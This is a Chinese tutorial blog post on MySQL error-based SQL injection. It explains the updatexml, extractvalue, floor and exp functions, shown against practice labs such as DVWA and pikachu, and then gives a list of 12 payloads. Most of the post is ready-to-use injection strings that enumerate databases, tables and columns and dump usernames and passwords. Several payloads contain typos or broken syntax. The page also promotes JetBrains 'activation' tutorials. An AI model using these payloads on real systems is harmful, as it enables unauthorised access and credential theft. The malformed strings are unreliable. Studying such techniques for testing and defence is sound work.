1. 全栈程序员必看首页

SQL注入报错注入函数[通俗易懂]

全栈程序员-站长 未分类 阅读 4

SQL注入报错注入函数[通俗易懂]前言报错注入的前提是当语句发生错误时,错误信息被输出到前端。其漏洞原因是由于开发人员在开发程序时使用了print_r(),mysql_error(),mysqli_connect_error()函数将mysql错误信息输出到前端,因此可以通过闭合原先的语句,去执行后面的语句。常用报错函数updatexml()是mysql对xml文档数据进行查询和修改的xpath函数extractvalue()是mysql对xml文档数据进行查询的xpa…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

        

前言

报错注入的前提是当语句发生错误时,错误信息被输出到前端。其漏洞原因是由于开发人员在开发程序时使用了print_r (),mysql_error(),mysqli_connect_error()函数将mysql错误信息输出到前端,因此可以通过闭合原先的语句,去执行后面的语句。

常用报错函数

updatexml()         是mysql对xml文档数据进行查询和修改的xpath函数extractvalue()      是mysql对xml文档数据进行查询的xpath函数floor()             mysql中用来取整的函数exp()               此函数返回e(自然对数的底)指数X的幂值

用法详解

updatexml()函数

updatexml()函数的作用就是改变(查找并替换)xml文档中符合条件的节点的值

语法:updatexml(xml_document,XPthstring,new_value)
第一个参数是字符串string(XML文档对象的名称)
第二个参数是指定字符串中的一个位置(Xpath格式的字符串)
第三个参数是将要替换成什么,string格式
Xpath定位必须是有效的,否则则会发生错误。我们就能利用这个特性爆出我们想要的数据

实例

注册就是往数据库里添加数据,insert。

SQL注入报错注入函数[通俗易懂]

在用户处输入单引号 报错

SQL注入报错注入函数[通俗易懂]

猜测后端语句

insert into user(name,password,sex,phone,address1,address2) value('xxx',123,1,2,3,4)

可以在xxx处对单引号闭合,爆出我们想要的数据

?id=1' or updatexml(0,concat(0x7e,select database()),1)'

闭合单引号使语句逃逸出来,之后重新构造语句查询,爆破出库名为:”pikachu”

SQL注入报错注入函数[通俗易懂]

分析过程

当输入payload

?id=1' or updatexml(0,concat(0x7e,select database()),1)or'

后端会被拼接为

insert into user(name,password,sex,phone,address1,address2) value('' or updatexml(1,concat(0x7e,database()),0) or '',

表名列名字段和正常查询一样只是换了个位置

利用过程

库名

1'and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)#

表名

1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #

查表信息(假定有一个users表,库名为dvwa

1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'),0x7e),1) #

查字段值(假设字段名为last_name(dvwa.users意思为调用dvwa库的users表)

1' and updatexml(1,concat(0x7e,(select group_concat(first_name,0x7e,last_name) from dvwa.users)),1) #

extractvalue()函数

extractvalue()函数的作用是从目标xml中返回包含所查询值的字符串
extractvalue (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为doc
第二个参数:XPath_string(Xpath格式的字符串),Xpath定位必须是有效的,否则会发生错误

构造payload

?id=1' or extracrvalue(0,concat(0x7e,database())) or '

SQL注入报错注入函数[通俗易懂]

注意xpath回显只有一位使用limit函数逐个爆,且最长为32位,超过32位爆不了

利用过程

当前库

1' and extractvalue(1,concat(0x7e,user(),0x7e,database())) #

当前表

1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #

表信息(假设表为users

1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) #

字段值(字段为user_id,first_name,last_name,(dvwa.users意思为调用dvwa库的users表)

1' and extractvalue(1,concat(0x7e,(select group_concat(user_id,0x7e,first_name,0x3a,last_name) from dvwa.users))) #

floor()函数

floor()是mysql的一个取整函数

库名

id=1' union select count(*),concat(floor(rand(0)*2),database()) x from information_schema.schemata group by x #

表名(库为dvwa,通过修改 limit 0,1值递增查表, limit 1,1、limit 2,1

id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(table_name) from information_schema.tables where table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x#

字段名(库:dvwa,表:users

id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x#

字段值(字段值:user,password(dvwa.users意思为调用dvwa库users表

id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from dvwa.users limit 0,1)) x from information_schema.schemata group by x#

exp()函数

当传递一个大于709的值时,函数exp()就会引起一个溢出错误。

库名

id=1' or exp(~(SELECT * from(select database())a)) or '

表名(库名:pikachu

id=1' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema = 'pikachu')a)) or '

字段名(表名:users

id=1' or exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name = 'users')a)) or '

字段值(字段名:password,表名:users

id=1' or wzp(~(select * from(select password from users limit 0,1)a)) or '

12种报错注入函数

1、通过floor报错,注入语句如下:

and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2、通过extractvalue报错,注入语句如下:

and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3、通过updatexml报错,注入语句如下:

and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4、通过exp报错,注入语句如下:

and exp(~(select * from (select user () ) a) );

5、通过join报错,注入语句如下:

select * from(select * from mysql.user ajoin mysql.user b)c;

6、通过NAME_CONST报错,注入语句如下:

and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c);

7、通过GeometryCollection()报错,注入语句如下:

and GeometryCollection(()select *from(select user () )a)b );

8、通过polygon ()报错,注入语句如下:

and polygon (()select * from(select user ())a)b );

9、通过multipoint ()报错,注入语句如下:

and multipoint (()select * from(select user() )a)b );

10、通过multlinestring ()报错,注入语句如下:

and multlinestring (()select * from(selectuser () )a)b );

11、通过multpolygon ()报错,注入语句如下:

and multpolygon (()select * from(selectuser () )a)b );

12、通过linestring ()报错,注入语句如下:

and linestring (()select * from(select user() )a)b );

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/187581.html原文链接:https://javaforall.net

(0)
0 0

关于作者

全栈程序员-站长的头像

全栈程序员-站长

133.5K 文章
3 粉丝
本网站汇聚当前互联网主流语音,持续更新,欢迎关注公众号“全栈程序员社区”
上一篇 2022年9月30日 上午9:00
下一篇 2022年9月30日 上午9:16


相关推荐

  • transactionscope mysql_TransactionScope事务操作

    transactionscope mysql_TransactionScope事务操作

    transactionscope mysql_TransactionScope事务操作using(TransactionScopetrans=newTransactionScope()){try{InsertUserBase();//它插入不成功,自己回滚UserInfosuserInfo=newUserInfos{UserID=”1″,RealName=”zzl”,};db.UserInfos.InsertOnSubmit(userInfo);db.SubmitC…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月24日
    13
  • datax(10): 源码解读Communication(Datax通讯类)「建议收藏」

    datax(10): 源码解读Communication(Datax通讯类)「建议收藏」

    datax(10): 源码解读Communication(Datax通讯类)「建议收藏」前面看了datax的通讯机制,继续看源码—具体的通讯类Communication。根据datax的运行模式的区别,数据的收集会有些区别,这篇文章都是讲的在standalone模式下。一、communication概述DataX所有的统计信息都会保存到Communication类里面。Communication支持下列数据的统计计数器,比如读取的字节速度,写入成功的数据条数/***所有的数值key-value对**/privateMap<String.

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月17日
    51
  • C++多态–虚函数virtual及override

    C++多态–虚函数virtual及override

    C++多态–虚函数virtual及overrideC 多态 C 多态 polymorphism 是通过虚函数来实现的 虚函数允许子类重新定义成员函数 而子类重新定义父类的做法称为覆盖 override 或者称为重写 最常见的用法就是声明基类的指针 利用该指针指向任意一个子类对象 调用相应的虚函数 动态绑定 由于编写代码的时候并不能确定被调用的是基类的函数还是哪个派生类的函数 所以被成为 虚 函数 如果没有使用虚函数的话 即没有利用 C

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月18日
    1
  • Linux挂载磁盘出现只读的问题

    Linux挂载磁盘出现只读的问题

    Linux挂载磁盘出现只读的问题由于挂载的是windows下使用的磁盘,是NTFS分区格式,使用mount查看当前挂载的设备,发现磁盘/dev/sdb2属性为ro,也就算readonly,使用如下命令修复即可:sudontfsfix/dev/sdb2修复成功出现NTFSpartition/dev/sda2wasprocessedsuccessfully.然后再修改磁盘读写属性:(好像也可以不改属性,使用unmount卸载掉磁盘后再挂载磁盘即可)mount-orw/dev/sda2/mnt/sda2参

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月19日
    30
  • gcc在Ubuntu上安装和使用「建议收藏」

    gcc在Ubuntu上安装和使用「建议收藏」

    gcc在Ubuntu上安装和使用「建议收藏」安装使用命令sudoaptinstallbuild-essential,该命令将安装一堆新包,包括gcc,g++和make。要验证GCC编译器是否已成功安装,可以使用gcc-v命令打印GCC版本:使用gcc命令格式如下:gcc[选项][文件名字]主要选项如下:-c:只编译不链接为可执行文件,编译器将输入的.c文件编译为.o的目标文件。-o:<输出文件名>用来指定编译结束以后的输出文件名,如果不使用这个选项的话GCC默认编译出来的可执行文件名字为a

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月24日
    12
  • 信捷plc梯形图实例详解_信捷plc单键启停梯形图

    信捷plc梯形图实例详解_信捷plc单键启停梯形图

    信捷plc梯形图实例详解_信捷plc单键启停梯形图一直以来都是作为新手在学习PLC,对于PLC编程,每个人都应该觉得自己是新手,只有心态放低,才能把事情看得更清楚,才能将编程的原理了解深透。就拿PLC一键启停编程梯形图来说,PLC种类很多,每个种类对应的编程或多或少有些差异,那么掌握一种一键启停梯形图编程是不是可以应用到其他种类的PLC呢?分享台达PLC的常见一键启停编程梯形图根据最近网友向我我请教的一个PLC单键启停如何编写程序,PLC外部接线…

    全栈程序员-站长的头像 全栈程序员-站长
    2025年10月24日
    6

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号